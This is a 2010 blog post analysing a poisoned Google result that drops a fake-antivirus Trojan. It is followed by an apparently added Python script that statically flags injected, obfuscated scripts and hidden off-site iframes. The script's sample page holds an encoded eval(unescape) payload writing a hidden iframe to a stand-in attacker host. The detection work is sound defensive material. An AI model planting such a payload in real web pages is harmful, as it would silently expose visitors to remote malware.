Wednesday, October 20, 2010

These are not the Google results you are looking for

One very common technique the bad guys use to get their malware onto your computer is to infect or hack legitimate websites. Another is to "poison" the major search engines' results, so that their malicious pages rank among the first hits for a query. Most people will visit the first few results to see if they can find what they are looking for.

For instance, searching Google today for "mexican salsa dishes pottery" demonstrates this beautifully.



The very first result is a malicious website. Please don't click on it unless you are on an analysis machine. I use Malzilla to examine this website.



This looks suspicious at first glance. For one thing, the JavaScript has been inserted at the very top of the HTML file, above the document's own markup, something you don't typically see with human-generated HTML. Also, the JavaScript looks obfuscated.

Using Malzilla to decode the JavaScript:



We can see that the JavaScript, when run, actually inserts a hidden iframe (1 pixel in size) that loads code from another site. I'll save you the trip... it installs a fake antivirus Trojan, and will do so automatically if you have a vulnerable Java runtime (and most likely will try other vulnerabilities if that doesn't work). In my case (on my analysis machine) it was Java.
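The three tells above (a script sitting above the page's own markup, an obfuscated payload, and a decoded hidden 1-pixel iframe to another host) can be checked statically without ever rendering the page. The script below is an added example, not code from this post or from Malzilla: it triages a constructed sample page (the hostname attacker.invalid and the page content are made up) by flagging a script placed before the document start, scoring it for obfuscation, undoing one layer of the common eval(unescape("%xx...")) wrapper without executing any JavaScript, and then reporting iframes that are 1 pixel or hidden and point off-site.

```python
"""Static triage of a suspect HTML page, as seen in SEO-poisoning drive-bys."""
import re
from urllib.parse import unquote, urlparse

# Constructed sample, not the real page from the post. The injected script sits
# above <html> and wraps its payload in eval(unescape("%xx...")); the payload
# writes a hidden 1x1 iframe to a made-up off-site host.
PAYLOAD = ('document.write(\'<iframe src="http://attacker.invalid/in.php" '
           'width="1" height="1" style="visibility:hidden"></iframe>\');')
SAMPLE_PAGE = (
    '<script type="text/javascript">eval(unescape("'
    + "".join("%%%02x" % b for b in PAYLOAD.encode())
    + '"));</script>\n'
    '<html><head><title>Mexican salsa dishes pottery</title></head>\n'
    '<body><h1>Talavera pottery</h1><p>Hand-painted salsa dishes.</p>\n'
    '<iframe src="http://www.example.com/video" width="480" height="360"></iframe>\n'
    '</body></html>'
)

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
DOC_START_RE = re.compile(r"<!doctype\b|<html\b|<head\b", re.I)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s"\'>]+))')
SUSPICIOUS_CALLS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")


def script_before_document(html):
    """True when a <script> appears before <!DOCTYPE>, <html> or <head>."""
    s = SCRIPT_RE.search(html)
    d = DOC_START_RE.search(html)
    return s is not None and (d is None or s.start() < d.start())


def obfuscation_score(js):
    """Crude score: count suspicious calls, add 3 if over half the text is
    %xx / \\xNN escape sequences. A threshold of 3 is an assumption."""
    score = sum(js.count(c) for c in SUSPICIOUS_CALLS)
    escapes = len(re.findall(r"%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}", js))
    if escapes * 6 > len(js):  # each escape is 3 chars, so >50% of the text
        score += 3
    return score


def decode_unescape(js):
    """Statically undo one eval(unescape("...")) layer; returns js unchanged
    if the pattern is absent. Handles only %xx escapes (not %uXXXX), and
    never executes the script."""
    m = re.search(r'unescape\(\s*"([^"]*)"\s*\)', js)
    return unquote(m.group(1)) if m else js


def _px(value):
    """Parse a width/height attribute; missing or non-numeric counts as large."""
    if value is None:
        return 10 ** 6
    m = re.match(r"\d+", value.strip())
    return int(m.group()) if m else 10 ** 6


def hidden_external_iframes(text, page_host):
    """Return src values of iframes that are <=1px or hidden and point to a
    host other than page_host. Works on raw HTML and on decoded JS strings."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = {}
        for a in ATTR_RE.finditer(m.group(1)):
            attrs[a.group(1).lower()] = next(v for v in a.groups()[1:] if v is not None)
        src = attrs.get("src", "")
        host = urlparse(src).hostname or page_host  # relative src = same site
        tiny = _px(attrs.get("width")) <= 1 or _px(attrs.get("height")) <= 1
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = "visibility:hidden" in style or "display:none" in style
        if (tiny or hidden) and host != page_host:
            hits.append(src)
    return hits


def triage(html, page_host):
    """Combine the checks into a list of findings for one page."""
    findings = []
    if script_before_document(html):
        findings.append("script injected before document start")
    for m in SCRIPT_RE.finditer(html):
        js = m.group(1)
        score = obfuscation_score(js)
        if score >= 3:
            findings.append("obfuscated script (score %d)" % score)
        for src in hidden_external_iframes(decode_unescape(js), page_host):
            findings.append("hidden off-site iframe in decoded script: " + src)
    for src in hidden_external_iframes(html, page_host):
        findings.append("hidden off-site iframe in page: " + src)
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_PAGE, "www.example.com"):
        print(finding)
```

The decoder only peels the one wrapper shown here; real droppers often stack several layers or use %uXXXX and String.fromCharCode, which is why a tool like Malzilla that can step through the script is still the right thing to reach for. The legitimate 480x360 iframe in the sample is correctly left alone, since size and visibility, not the mere presence of an iframe, are what mark the injected one.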
